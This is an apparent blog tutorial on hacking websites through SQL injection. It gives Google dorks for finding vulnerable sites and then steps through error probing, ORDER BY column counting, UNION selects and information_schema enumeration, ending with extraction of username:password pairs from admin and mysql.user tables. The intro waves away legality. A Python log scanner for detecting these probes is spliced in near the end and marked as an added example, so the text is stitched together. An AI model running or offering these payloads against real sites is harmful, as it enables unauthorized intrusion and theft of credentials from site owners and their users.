
Hacking Websites Using SQL Injection: A Complete Step-by-Step Guide


Hacking websites is fun for any hacker, because he loves doing it. It doesn't matter whether it is legal or illegal, and it doesn't mean that he will do any harm to the site or to the website owner. Sometimes hackers hack websites because they want to learn something new, or they just want to test their skills on the internet.

There are many methods for hacking websites, and one of the most popular is SQL injection. SQL injection is a code injection technique used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution (for example, to dump the database contents to the attacker).

SQL injection must exploit a security vulnerability in an application's software, for example when user input is either incorrectly filtered for string-literal escape characters embedded in SQL statements, or is not strongly typed and is unexpectedly executed. SQL injection is mostly known as an attack vector for websites, but it can be used to attack any type of SQL database.

SQL injection attacks allow attackers to spoof identity, tamper with existing data, cause repudiation issues such as voiding transactions or changing balances, allow the complete disclosure of all data on the system, destroy the data or make it otherwise unavailable, and become administrators of the database server.

What are SQL and a Database?

Before we go deep into SQL injection and start hacking websites, we should know what SQL and a database are.

Database:

A database is a collection of data. From a website's point of view, the database is used for storing user IDs, passwords, web page details and more.

Some databases are:

  • DB servers
  • MySQL (open source)
  • MSSQL
  • MS-ACCESS
  • Oracle
  • PostgreSQL (open source)
  • SQLite

SQL:

SQL stands for Structured Query Language. To communicate with the database, we use SQL queries. Because we are querying the database, it is called a query language.

Definition from The Complete Reference:

SQL is a tool for organizing, managing, and retrieving data stored by a computer database. The name “SQL” is an abbreviation for Structured Query Language. For historical reasons, SQL is usually pronounced “sequel,” but the alternate pronunciation “S.Q.L.” is also used. As the name implies, SQL is a computer language that you use to interact with a database. In fact, SQL works with one specific type of database, called a relational database.

Simple Basic Queries for SQL:

select * from table_name: this statement shows the contents of a table, including the column names.

For example: select * from users;

insert into table_name(column_names, ...) values(corresponding values for the columns): inserts data into a table.

For example: insert into users(username,userid) values('BreakTheSec','break');

I will give more detail and queries about SQL in my next thread.

What is SQL Injection?

SQL injection is a common and well-known method of hacking websites at present. Using this method, an unauthorized person can access the website's database and get all the details from it.

What can an attacker do?

  • Bypassing logins
  • Accessing secret data
  • Modifying the contents of the website
  • Shutting down the MySQL server

What Is Website Defacement?

Website defacement or Hacking Websites is an attack on a website that changes the visual appearance of the site or a web page. These are typically the work of system crackers, who break into a web server and replace the hosted website with one of their own. Defacement is generally meant as a kind of electronic graffiti and, as other forms of vandalism, is also used to spread messages by politically motivated “Cyber Protesters” or “Hacktivists”.

Defacing a website simply means replacing the index.html file of a site with the attacker's own file. Now all the users who open the website will see the page uploaded by the attacker.

Hacking Websites Using SQL Injection

Now let's dive into the real procedure for SQL injection and hacking websites.

0. Finding a Vulnerable Website:

Our best partner for SQL injection is Google. We can find vulnerable (hackable) websites using a Google dork list. A Google dork is a search that finds vulnerable websites using Google search tricks. There are lots of tricks for searching in Google, but we are going to use the "inurl:" operator to find vulnerable websites.

Some Examples:

  • inurl:index.php?id=
  • inurl:gallery.php?id=
  • inurl:article.php?id=
  • inurl:pageid=

How to use them?

  • Copy one of the above commands and paste it into the Google search box.
  • Hit enter.
  • You get a list of websites.
  • We have to visit the websites one by one to check for the vulnerability.
  • So start from the first website.

Note: If you want to hack a particular website, try this: site:www.victimsite.com dork_list_commands

For example: site:www.victimsite.com inurl:index.php?id=

1. Vulnerability Check:

To check a website for SQL injection, you need to find a page whose URL looks like this:

http://www.website.com/news.php?id=1

Now, to test whether it's vulnerable, we add a ' (single quote) to the end of the URL, so it looks like:

http://www.website.com/news.php?id=1'

If the site is vulnerable, the page will show a MySQL error similar to:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc…

That means the site is vulnerable to SQL injection; if the page loads as normal, then the website is not vulnerable to SQL injection.

2. Finding the number of columns:

To find the number of columns, we'll use the ORDER BY clause, which tells the database how to order the result. We just keep incrementing the number until we get an error.

http://www.website.com/news.php?id=1 order by 1/* <– No Error
http://www.website.com/news.php?id=1 order by 2/* <– No Error
http://www.website.com/news.php?id=1 order by 3/* <– No Error
http://www.website.com/news.php?id=1 order by 4/* <– Error

We'll get a message like: Unknown column '4' in 'order clause' (or something similar), which means there are 3 columns, as we got an error on 4.

3. Check for the UNION function:

Now we are going to use the UNION command to find the vulnerable columns, because with UNION we can select more data in one SQL statement. So we have:

http://www.website.com/news.php?id=1 union all select 1,2,3/* (as we've already found in the second step that the number of columns is 3)

If we see some of the numbers on the screen, i.e. 1, 2 or 3, then the UNION works.

4. Check for the Database Version:

We now need to find the database version, name and user. We do this by replacing the vulnerable column numbers with the following functions:

  • user()
  • database()
  • version()

Or if these don’t work then try:

  • @@user
  • @@version
  • @@database

The URL would look like:

[Screenshot: Check for DataBase Version 1]

If you get an error like "union + illegal mix of collations (IMPLICIT + COERCIBLE) ...", then what we need is the convert() function. (I didn't see any website article covering this problem, so I must cover it.)

[Screenshot: Check for DataBase Version 2]

Or with hex() and unhex():

[Screenshot: Check for DataBase Version 3]

The resulting page would then show the database user and the MySQL version, for example [email protected] and MySQL 5.0.83.

IMPORTANT: If the version is 5 or above, read on to carry out the attack; if it is 4 or below, you have to brute-force or guess the table and column names (programs can be used to do this).

5. Obtaining Table and Column Names:

In this step we aim to list all the table names in the database. The "table_name" goes in the vulnerable column number you found earlier. If the command is entered correctly, the page should show all the tables in the database, so look for tables that may contain useful information such as passwords: admin, member or user tables. But in most cases we must guess the table and column names.

Common table names are: user/s, admin/s, member/s, etc.

Common column names are: username, user, usr, user_name, password, pass, passwd, pwd, etc.

The URL would be http://www.website.com/news.php?id=1 union all select 1,2,3 from admin/* (we see the number 2 on the screen like before, and that's good).

We know that the table admin exists. Now to check the column names:

http://www.website.com/news.php?id=1 union all select 1, username, 3 from admin/* (if you get an error, then try another column name)

We get the username displayed on the screen; for example admin, superadmin, etc. Now to check whether the column password exists:

http://www.website.com/news.php?id=1 union all select 1, password, 3 from admin/* (if you get an error, then try the other column name)

We'll see the password on the screen in hash or plain-text format; it depends on how the database is set up, i.e. MD5 hash, MySQL hash, SHA1, etc.

Now we must complete the query as we need it. For that, we can use the concat() function (it joins strings).

e.g. http://www.website.com/news.php?id=1 union all select 1, concat(username,0x3a,password),3 from admin/*

Note: Here I used 0x3a, the hex value for a colon. Another way is to use the ASCII value, e.g. char(58):

http://www.website.com/news.php?id=1 union all select 1,concat(username,char(58),password),3 from admin/*

Now we get username:password displayed on screen, e.g. admin:admin or admin:HACKAGON.

When you have this, you can log in as admin or some superuser. If you can't guess the right table name, you can always try mysql.user (the default). It has user and password columns, so the URL would be:

http://www.website.com/news.php?id=1 union all select 1,concat(user,0x3a,password),3 from mysql.user/*

6. In case of MySQL 5:

Up to step 5 is for MySQL version < 5 (i.e. 4.1.33, 4.1.12, etc.), but for MySQL 5 we need information_schema. It holds all the tables and columns in the database. To get the tables, we use table_name and information_schema.tables.

e.g. http://www.website.com/news.php?id=1 union all select 1,table_name,3 from information_schema.tables/*

Here we replace our number 2 with table_name to get the first table from information_schema.tables displayed on the screen. Now we must add LIMIT to the end of the query to list all the tables.

e.g. http://www.website.com/news.php?id=1 union all select 1,table_name,3 from information_schema.tables limit 0,1/*

Note: Here I put 0,1 (get 1 result starting from the 0th).

Now to view the second table, we’ll change limit 0,1 to limit 1,1

i.e. http://www.website.com/news.php?id=1 union all select 1,table_name,3 from information_schema.tables limit 1,1/*

The second table is displayed. Now for the third table, we put limit 2,1

i.e. http://www.website.com/news.php?id=1 union all select 1,table_name,3 from information_schema.tables limit 2,1/*

Keep incrementing the limit until you get some useful table like db_admin, poll_user, auth, auth_user, etc.

To get the column names, the method is the same, except that we use column_name and information_schema.columns. So the example would be:

http://www.website.com/news.php?id=1 union all select 1,column_name,3 from information_schema.columns limit 0,1/*

The first column is displayed. For the second one, we change limit 0,1 to limit 1,1:

i.e. http://www.website.com/news.php?id=1 union all select 1,column_name,3 from information_schema.columns limit 1,1/*

The second column is displayed, so keep incrementing the limit until you get something like username, user, login, password, pass, passwd, etc.

If you want to display the column names for a specific table, use a WHERE clause. Let's say that we found the table users.

e.g. http://www.website.com/news.php?id=1 union all select 1,column_name,3 from information_schema.columns where table_name='users'/*

Now we get the column names of the table users displayed. Using LIMIT, we can list all the columns in the table users.

Note: This won't work if magic quotes are ON.

Let's say that we found the columns user, pass and email. Now complete the query to put them all together. For that we use concat(), as I used it earlier.

e.g. http://www.website.com/news.php?id=1 union all select 1,concat(user,0x3a,pass,0x3a,email),3 from users/*

Here we get user:pass:email from the table users. Example: admin:hash:[email protected]
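The whole sequence above (quote probe, ORDER BY counting, UNION, then information_schema enumeration with an incrementing LIMIT) leaves a recognisable trail in the web server's access log. The following is an added example, not part of the original article: a small Python scanner that URL-decodes each request's query string, tags the indicators matching those steps, and counts flagged requests per client. The log lines and IP addresses are constructed for the example; the indicator names are my own and the log format assumed is the common Apache/nginx access-log format.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Added example: flag the probing URLs from the walkthrough in access logs.
# The log lines below are constructed for this example, not from any real server.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /news.php?id=1 HTTP/1.1" 200 5120
203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /news.php?id=1%27 HTTP/1.1" 500 311
203.0.113.5 - - [10/Oct/2023:13:55:51 +0000] "GET /news.php?id=1%20order%20by%204/* HTTP/1.1" 500 298
203.0.113.5 - - [10/Oct/2023:13:56:07 +0000] "GET /news.php?id=1%20union%20all%20select%201,2,3/* HTTP/1.1" 200 5132
203.0.113.5 - - [10/Oct/2023:13:56:30 +0000] "GET /news.php?id=1+union+all+select+1,table_name,3+from+information_schema.tables+limit+0,1/* HTTP/1.1" 200 5140
198.51.100.7 - - [10/Oct/2023:13:57:02 +0000] "GET /gallery.php?id=42 HTTP/1.1" 200 8800
"""

# Common log format: client, ident, user, [timestamp], "METHOD path HTTP/x.y", status.
REQUEST_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})'
)

# Each indicator corresponds to one step of the walkthrough (names are my own).
INDICATORS = [
    ("quote_in_parameter", re.compile(r"'")),
    ("order_by_probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union_select", re.compile(r"\bunion\b.*\bselect\b", re.I)),
    ("schema_enumeration", re.compile(r"information_schema", re.I)),
    ("comment_terminator", re.compile(r"/\*|--")),
]


def classify_query(query):
    """Return the names of the indicators that match a decoded query string."""
    return [name for name, pattern in INDICATORS if pattern.search(query)]


def scan_log(text):
    """Return one finding per request whose decoded query string matches an indicator."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        ip, path, status = m.group(1), m.group(2), int(m.group(3))
        if "?" not in path:
            continue
        # Decode %27, %20 and '+' so the patterns see the SQL the server saw.
        query = unquote_plus(path.split("?", 1)[1])
        hits = classify_query(query)
        if hits:
            findings.append({"ip": ip, "path": path, "status": status, "indicators": hits})
    return findings


def hits_per_ip(findings):
    """Count flagged requests per client: one source walking the quote -> ORDER BY ->
    UNION -> information_schema sequence is the pattern worth alerting on."""
    return Counter(f["ip"] for f in findings)


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for f in found:
        print(f["ip"], f["status"], f["indicators"], f["path"])
    print(hits_per_ip(found))
```

A 500 status following a quoted parameter is the server-side twin of the "You have an error in your SQL syntax" page described in step 1, so pairing the status code with the indicators helps separate a real probe from an odd but harmless URL.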

Note: This guide about hacking websites is for knowledge purposes only and shouldn't be used for any illegal activities, as we are not responsible for anything that happens with this.

Hope you like this article about hacking websites. So don't forget to share it with your friends, and feel free to drop a comment below if you still face any kind of problem.
